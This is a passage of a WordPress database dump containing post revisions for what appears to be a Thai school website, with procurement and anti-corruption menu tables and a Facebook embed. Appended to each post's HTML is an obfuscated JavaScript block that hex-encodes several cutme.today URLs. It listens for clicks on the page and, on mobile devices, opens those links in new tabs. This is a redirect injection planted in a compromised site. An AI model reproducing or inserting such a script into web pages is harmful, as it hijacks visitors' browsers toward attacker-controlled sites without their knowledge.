is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:18:05','2024-07-27 04:18:05','',14,'http://pakhaeng.ssk.in.th/?p=90',0,'revision','',0),
(92,1,'2024-07-27 11:20:18','2024-07-27 04:20:18','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid03yQQzYTuGmLGigSuhf8YSNG7oikoVbMU6dAxLbwsUvPkxYjnbhnNhuJwhRKergbxl&show_text=true&width=500\" width=\"500\" height=\"664\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 